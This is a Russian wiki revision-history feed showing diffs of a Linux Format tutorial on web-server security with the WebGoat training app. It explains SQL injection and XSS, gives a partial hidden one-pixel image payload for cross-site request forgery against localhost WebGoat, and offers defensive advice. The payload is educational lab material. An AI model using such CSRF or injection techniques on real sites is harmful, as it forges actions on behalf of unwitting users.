		<link rel="alternate" type="text/html" href="http://wiki.linuxformat.ru/wiki/index.php?title=LXF159:%D0%A5%D0%B0%D0%BA%D0%B5%D1%80%D0%B0%D0%BC:_C%D0%B0%D0%B9%D1%82_%D0%B2_%D0%B1%D0%B5%D0%B7%D0%BE%D0%BF%D0%B0%D1%81%D0%BD%D0%BE%D1%81%D1%82%D0%B8&amp;diff=18010&amp;oldid=prev"/>
				<updated>2018-09-25T09:35:10Z</updated>
		
		<summary type="html">&lt;p&gt;‎&lt;span dir=&quot;auto&quot;&gt;&lt;span class=&quot;autocomment&quot;&gt;Ха­ке­рам: Cайт в безо­пас­но­сти&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;table class='diff diff-contentalign-left'&gt;
				&lt;col class='diff-marker' /&gt;
				&lt;col class='diff-content' /&gt;
				&lt;col class='diff-marker' /&gt;
				&lt;col class='diff-content' /&gt;
			&lt;tr valign='top'&gt;
			&lt;td colspan='2' style=&quot;background-color: white; color:black;&quot;&gt;← Предыдущая&lt;/td&gt;
			&lt;td colspan='2' style=&quot;background-color: white; color:black;&quot;&gt;Версия 09:35, 25 сентября 2018&lt;/td&gt;
			&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Строка 110:&lt;/td&gt;
&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Строка 110:&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;Луч­шая за­щи­та от SQL-инъ­ек­ции – и мно­гих дру­гих атак – пра­виль­ная про­вер­ка по­лей вво­да. Очень немно­гим по­лям требуются сим­во­лы «=», «’» и « %». А ес­ли ввод этих сим­во­лов все же необходим, обя­за­тель­но эк­ранируй­те их пе­ред пе­ре­да­чей в ба­зу дан­ных. Это нуж­но де­лать на сер­ве­ре, так как с по­мо­щью WebScarab или дру­гих ути­лит для манипу­ля­ции с HTTP-за­про­са­ми мож­но обой­ти ва­ли­да­цию по­лей вво­да брау­зе­ром.&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;Луч­шая за­щи­та от SQL-инъ­ек­ции – и мно­гих дру­гих атак – пра­виль­ная про­вер­ка по­лей вво­да. Очень немно­гим по­лям требуются сим­во­лы «=», «’» и « %». А ес­ли ввод этих сим­во­лов все же необходим, обя­за­тель­но эк­ранируй­те их пе­ред пе­ре­да­чей в ба­зу дан­ных. Это нуж­но де­лать на сер­ве­ре, так как с по­мо­щью WebScarab или дру­гих ути­лит для манипу­ля­ции с HTTP-за­про­са­ми мож­но обой­ти ва­ли­да­цию по­лей вво­да брау­зе­ром.&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;background: #ffa; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;Меж­сай­то­вый скрип­тинг&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;background: #cfc; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;==&lt;/ins&gt;Меж­сай­то­вый скрип­тинг&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;==&lt;/ins&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;Меж­сай­то­вый скрип­тинг (Cross Site Scripting, или XSS) – ме­тод воз­дей­ст­вия на участок сай­та, чтобы тот ото­бра­жал ва­ше­ со­дер­жи­мое. Это воз­мож­но, когда на ин­те­рак­тив­ном сай­те раз­ме­ща­ют­ся дан­ные, вво­ди­мые поль­зо­ва­те­ля­ми. От­крой­те пункт ме­ню Cross-Site Scripting (XSS) &amp;gt; Phishing With XSS [Меж­сай­то­вый скрип­тинг (XSS) &amp;gt; Фи­шинг с XSS]. Сна­ча­ла про­сто на­бе­ри­те Test в по­ле по­ис­ка и на­жми­те Search [Ис­кать]. На странице поя­вит­ся:&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;Меж­сай­то­вый скрип­тинг (Cross Site Scripting, или XSS) – ме­тод воз­дей­ст­вия на участок сай­та, чтобы тот ото­бра­жал ва­ше­ со­дер­жи­мое. Это воз­мож­но, когда на ин­те­рак­тив­ном сай­те раз­ме­ща­ют­ся дан­ные, вво­ди­мые поль­зо­ва­те­ля­ми. От­крой­те пункт ме­ню Cross-Site Scripting (XSS) &amp;gt; Phishing With XSS [Меж­сай­то­вый скрип­тинг (XSS) &amp;gt; Фи­шинг с XSS]. Сна­ча­ла про­сто на­бе­ри­те Test в по­ле по­ис­ка и на­жми­те Search [Ис­кать]. На странице поя­вит­ся:&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Строка 137:&lt;/td&gt;
&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Строка 137:&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;С по­мо­щью XSS так­же мож­но за­ста­вить брау­зер поль­зо­ва­те­ля вы­полнить дей­ст­вие, ко­то­ро­го он де­лать не со­би­рал­ся. По­сколь­ку ин­те­рак­тив­ные web-страницы ра­бо­та­ют под управ­лением про­то­ко­ла HTTP, то ес­ли мы за­ста­вим брау­зер вы­полнить за­прос HTTP GET, сер­вер мо­жет по­ду­мать, что поль­зо­ва­тель хо­чет вы­полнить это дей­ст­вие. Са­мый про­стой спо­соб за­ста­вить брау­зер вы­полнить за­прос HTTP GET – с по­мо­щью за­груз­ки изо­бра­жения. Что­бы это изо­бра­жение не по­влия­ло на внешний вид страницы, мы мо­жем сде­лать его раз­ме­ром в один пик­сель. Пе­рей­ди­те в Cross Site Request Forgery [Соз­дание меж­сай­то­вых за­про­сов] и вве­ди­те за­го­ло­вок «Кру­тое со­об­щение – про­чти­те обя­за­тель­но» и со­об­щение:&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;С по­мо­щью XSS так­же мож­но за­ста­вить брау­зер поль­зо­ва­те­ля вы­полнить дей­ст­вие, ко­то­ро­го он де­лать не со­би­рал­ся. По­сколь­ку ин­те­рак­тив­ные web-страницы ра­бо­та­ют под управ­лением про­то­ко­ла HTTP, то ес­ли мы за­ста­вим брау­зер вы­полнить за­прос HTTP GET, сер­вер мо­жет по­ду­мать, что поль­зо­ва­тель хо­чет вы­полнить это дей­ст­вие. Са­мый про­стой спо­соб за­ста­вить брау­зер вы­полнить за­прос HTTP GET – с по­мо­щью за­груз­ки изо­бра­жения. Что­бы это изо­бра­жение не по­влия­ло на внешний вид страницы, мы мо­жем сде­лать его раз­ме­ром в один пик­сель. Пе­рей­ди­те в Cross Site Request Forgery [Соз­дание меж­сай­то­вых за­про­сов] и вве­ди­те за­го­ло­вок «Кру­тое со­об­щение – про­чти­те обя­за­тель­но» и со­об­щение:&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;background: #ffa; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;Это важ­ная ин­фор­ма­ция.&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;background: #cfc; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;==&lt;/ins&gt;Это важ­ная ин­фор­ма­ция.&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;==&lt;/ins&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;&amp;lt;img src=”http://localhost:8080/webgoat/attack?Screen=89&amp;amp; &amp;#160;&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;&amp;lt;img src=”http://localhost:8080/webgoat/attack?Screen=89&amp;amp; &amp;#160;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Строка 157:&lt;/td&gt;
&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Строка 157:&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;&amp;lt;img id=”image2” width=”1” height=”1” /&amp;gt;&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;&amp;lt;img id=”image2” width=”1” height=”1” /&amp;gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;background: #ffa; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;Сни­же­ние рис­ка&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;background: #cfc; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;==&lt;/ins&gt;Сни­же­ние рис­ка&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;==&lt;/ins&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;Су­ще­ст­ву­ет несколь­ко спо­со­бов снизить риск атак с под­держ­кой меж­сай­то­вых за­про­сов. Так как для их вы­полнения поль­зо­ва­тель дол­жен быть в сис­те­ме, мож­но снизить ве­ро­ят­ность атак, ав­то­ма­ти­че­­ски от­клю­чая поль­зо­ва­те­ля по­сле неко­то­ро­го пе­рио­да без­дей­ст­вия. Кро­ме то­го, мож­но восполь­зо­вать­ся CSRF Guard, ко­то­рый мож­но най­ти на сай­те www.owasp.org/index.php/PHP_CSRF_Guard.&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;Су­ще­ст­ву­ет несколь­ко спо­со­бов снизить риск атак с под­держ­кой меж­сай­то­вых за­про­сов. Так как для их вы­полнения поль­зо­ва­тель дол­жен быть в сис­те­ме, мож­но снизить ве­ро­ят­ность атак, ав­то­ма­ти­че­­ски от­клю­чая поль­зо­ва­те­ля по­сле неко­то­ро­го пе­рио­да без­дей­ст­вия. Кро­ме то­го, мож­но восполь­зо­вать­ся CSRF Guard, ко­то­рый мож­но най­ти на сай­те www.owasp.org/index.php/PHP_CSRF_Guard.&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;SQL-инъ­ек­ция и XSS – лишь две раз­но­вид­но­сти атак на сай­ты. В WebGoat есть при­ме­ры мно­гих дру­гих. Восполь­зуй­тесь ссыл­ка­ми Hints и Solutions в верхней час­ти страницы с уро­ка­ми. За­щи­та ва­ше­го сай­та от та­ких атак обыч­но сво­дит­ся к кор­рект­ной ва­ли­да­ции и эк­раниро­ванию по­тен­ци­аль­но опас­ных сим­во­лов. Не­сколь­ко при­ме­ров атак мож­но най­ти в раз­де­ле Applications &amp;gt; Internet &amp;gt; Web App Testing Tools [При­ло­жения &amp;gt; Ин­тернет &amp;gt; Ути­ли­ты для тес­ти­ро­вания web-при­ло­жений], и с их по­мо­щью про­ве­рить, ра­бо­та­ет ли ва­ша за­щи­та. Под­роб­ную ин­фор­ма­цию о долж­ных ме­рах за­щи­ты мож­но най­ти на сай­те www.owasp.org/index.php/Cheat_Sheets. |&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;SQL-инъ­ек­ция и XSS – лишь две раз­но­вид­но­сти атак на сай­ты. В WebGoat есть при­ме­ры мно­гих дру­гих. Восполь­зуй­тесь ссыл­ка­ми Hints и Solutions в верхней час­ти страницы с уро­ка­ми. За­щи­та ва­ше­го сай­та от та­ких атак обыч­но сво­дит­ся к кор­рект­ной ва­ли­да­ции и эк­раниро­ванию по­тен­ци­аль­но опас­ных сим­во­лов. Не­сколь­ко при­ме­ров атак мож­но най­ти в раз­де­ле Applications &amp;gt; Internet &amp;gt; Web App Testing Tools [При­ло­жения &amp;gt; Ин­тернет &amp;gt; Ути­ли­ты для тес­ти­ро­вания web-при­ло­жений], и с их по­мо­щью про­ве­рить, ра­бо­та­ет ли ва­ша за­щи­та. Под­роб­ную ин­фор­ма­цию о долж­ных ме­рах за­щи­ты мож­но най­ти на сай­те www.owasp.org/index.php/Cheat_Sheets. |&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/table&gt;</summary>
		<author><name>Olkol</name></author>	</entry>

	<entry>
		<id>http://wiki.linuxformat.ru/wiki/index.php?title=LXF159:%D0%A5%D0%B0%D0%BA%D0%B5%D1%80%D0%B0%D0%BC:_C%D0%B0%D0%B9%D1%82_%D0%B2_%D0%B1%D0%B5%D0%B7%D0%BE%D0%BF%D0%B0%D1%81%D0%BD%D0%BE%D1%81%D1%82%D0%B8&amp;diff=18009&amp;oldid=prev</id>
		<title>Olkol: /* Ха­ке­рам: Cайт в безо­пас­но­сти */</title>
		<link rel="alternate" type="text/html" href="http://wiki.linuxformat.ru/wiki/index.php?title=LXF159:%D0%A5%D0%B0%D0%BA%D0%B5%D1%80%D0%B0%D0%BC:_C%D0%B0%D0%B9%D1%82_%D0%B2_%D0%B1%D0%B5%D0%B7%D0%BE%D0%BF%D0%B0%D1%81%D0%BD%D0%BE%D1%81%D1%82%D0%B8&amp;diff=18009&amp;oldid=prev"/>
				<updated>2018-09-25T09:26:18Z</updated>
		
		<summary type="html">&lt;p&gt;‎&lt;span dir=&quot;auto&quot;&gt;&lt;span class=&quot;autocomment&quot;&gt;Ха­ке­рам: Cайт в безо­пас­но­сти&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;table class='diff diff-contentalign-left'&gt;
				&lt;col class='diff-marker' /&gt;
				&lt;col class='diff-content' /&gt;
				&lt;col class='diff-marker' /&gt;
				&lt;col class='diff-content' /&gt;
			&lt;tr valign='top'&gt;
			&lt;td colspan='2' style=&quot;background-color: white; color:black;&quot;&gt;← Предыдущая&lt;/td&gt;
			&lt;td colspan='2' style=&quot;background-color: white; color:black;&quot;&gt;Версия 09:26, 25 сентября 2018&lt;/td&gt;
			&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Строка 6:&lt;/td&gt;
&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Строка 6:&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;''Безо­пас­ность web-сер­ве­ра. Пре­дот­вра­ти­те трю­ки ха­ке­ров с по­мо­щью WebGoat.''&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;''Безо­пас­ность web-сер­ве­ра. Пре­дот­вра­ти­те трю­ки ха­ке­ров с по­мо­щью WebGoat.''&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;background: #ffa; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;[[Файл: Expert.png| left&amp;#160; |thumb|100px|&amp;#160; Бен Эве­рард&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;background: #cfc; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;[[Файл: Expert.png| left&amp;#160; |thumb|100px|&amp;#160; &lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;'''Наш эксперт'''. &lt;/ins&gt;Бен Эве­рард&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;бро­сил ра­бо­ту IT-кон­суль­тан­та, что­бы от­пра­вить­ся на два го­да в Тан­за­нию ус­та­навли­­вать сис­те­мы на ба­зе Ubuntu в шко­лах. Те­перь его зна­ния на­хо­дят при­ме­не­ние в бур­ля­щем кот­ле от­кры­тий – ре­дак­ции Linux Format. ]]&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;бро­сил ра­бо­ту IT-кон­суль­тан­та, что­бы от­пра­вить­ся на два го­да в Тан­за­нию ус­та­навли­­вать сис­те­мы на ба­зе Ubuntu в шко­лах. Те­перь его зна­ния на­хо­дят при­ме­не­ние в бур­ля­щем кот­ле от­кры­тий – ре­дак­ции Linux Format. ]]&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;background: #ffa; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;{{Врезка|left|Заголовок=Наш эксперт |Ширина=20%|Содержание= }}&lt;/del&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;background: #cfc; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;&amp;#160;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;Ду­мае­те, при по­след­них за­плат­ках безо­пас­но­сти Apache ваш сайт за­щи­щен? Бен Эве­рард по­ка­зы­ва­ет, что ха­ке­ры все еще мо­гут до не­го до­б­рать­ся.&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;Ду­мае­те, при по­след­них за­плат­ках безо­пас­но­сти Apache ваш сайт за­щи­щен? Бен Эве­рард по­ка­зы­ва­ет, что ха­ке­ры все еще мо­гут до не­го до­б­рать­ся.&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/table&gt;</summary>
		<author><name>Olkol</name></author>	</entry>

	<entry>
		<id>http://wiki.linuxformat.ru/wiki/index.php?title=LXF159:%D0%A5%D0%B0%D0%BA%D0%B5%D1%80%D0%B0%D0%BC:_C%D0%B0%D0%B9%D1%82_%D0%B2_%D0%B1%D0%B5%D0%B7%D0%BE%D0%BF%D0%B0%D1%81%D0%BD%D0%BE%D1%81%D1%82%D0%B8&amp;diff=18007&amp;oldid=prev</id>
		<title>Olkol: /* Ата­куй­те и раз­ру­шай­те */</title>
		<link rel="alternate" type="text/html" href="http://wiki.linuxformat.ru/wiki/index.php?title=LXF159:%D0%A5%D0%B0%D0%BA%D0%B5%D1%80%D0%B0%D0%BC:_C%D0%B0%D0%B9%D1%82_%D0%B2_%D0%B1%D0%B5%D0%B7%D0%BE%D0%BF%D0%B0%D1%81%D0%BD%D0%BE%D1%81%D1%82%D0%B8&amp;diff=18007&amp;oldid=prev"/>
				<updated>2018-09-25T05:21:23Z</updated>
		
		<summary type="html">&lt;p&gt;‎&lt;span dir=&quot;auto&quot;&gt;&lt;span class=&quot;autocomment&quot;&gt;Ата­куй­те и раз­ру­шай­те&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;table class='diff diff-contentalign-left'&gt;
				&lt;col class='diff-marker' /&gt;
				&lt;col class='diff-content' /&gt;
				&lt;col class='diff-marker' /&gt;
				&lt;col class='diff-content' /&gt;
			&lt;tr valign='top'&gt;
			&lt;td colspan='2' style=&quot;background-color: white; color:black;&quot;&gt;← Предыдущая&lt;/td&gt;
			&lt;td colspan='2' style=&quot;background-color: white; color:black;&quot;&gt;Версия 05:21, 25 сентября 2018&lt;/td&gt;
			&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Строка 86:&lt;/td&gt;
&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Строка 86:&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;Так как в SQL % – это мас­ка, то за­прос вернет все дан­ные из таб­ли­цы weather_data. Это че­ты­ре стан­ции в вы­па­даю­щем спи­ске и еще две, ко­то­рые соз­да­те­ли сай­та хо­те­ли скрыть. По за­вер­шении это­го уп­ражнения сайт пе­ре­клю­чит­ся в бо­лее за­щи­щен­ную кон­фи­гу­ра­цию, в ко­то­рой он про­ве­ря­ет, яв­ля­ет­ся ли ввод в SQL-за­прос чис­лом. Ес­ли вы по­пы­тае­тесь вы­полнить за­прос еще раз, ата­ка за­вер­шит­ся неудач­но.&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;Так как в SQL % – это мас­ка, то за­прос вернет все дан­ные из таб­ли­цы weather_data. Это че­ты­ре стан­ции в вы­па­даю­щем спи­ске и еще две, ко­то­рые соз­да­те­ли сай­та хо­те­ли скрыть. По за­вер­шении это­го уп­ражнения сайт пе­ре­клю­чит­ся в бо­лее за­щи­щен­ную кон­фи­гу­ра­цию, в ко­то­рой он про­ве­ря­ет, яв­ля­ет­ся ли ввод в SQL-за­прос чис­лом. Ес­ли вы по­пы­тае­тесь вы­полнить за­прос еще раз, ата­ка за­вер­шит­ся неудач­но.&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt;&amp;#160;&lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;background: #cfc; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;&lt;ins style=&quot;color: red; font-weight: bold; text-decoration: none;&quot;&gt;{{Врезка|right|Ширина=40%|Заголовок= Скорая помощь|Содержание= Во мно­гих при­ме­рах в при­ло­же­нии есть ошиб­ки в URL-ад­ре­сах. Убе­ди­тесь, что webgoat на­пи­са­но не за­глав­ны­ми бу­к­ва­ми и что ис­поль­зу­ют­ся вер­ные но­ме­ра ме­ню и эк­ра­нов.}}&lt;/ins&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;Те­перь пе­рей­дем в LAB: SQL Injection [ПРИМЕРЫ: SQL-инъ­ек­ция] и рас­смот­рим неко­то­рые спо­со­бы при­менения этой техники. В на­ших при­ме­рах ис­поль­зу­ет­ся ад­минист­ра­тив­ный сайт вы­мыш­лен­ной ком­пании Goat Hills. На пер­вом эта­пе мы об­ман­ным пу­тем за­ста­вим сайт впустить нас в сис­те­му, не зная па­ро­ля.&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;Те­перь пе­рей­дем в LAB: SQL Injection [ПРИМЕРЫ: SQL-инъ­ек­ция] и рас­смот­рим неко­то­рые спо­со­бы при­менения этой техники. В на­ших при­ме­рах ис­поль­зу­ет­ся ад­минист­ра­тив­ный сайт вы­мыш­лен­ной ком­пании Goat Hills. На пер­вом эта­пе мы об­ман­ным пу­тем за­ста­вим сайт впустить нас в сис­те­му, не зная па­ро­ля.&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
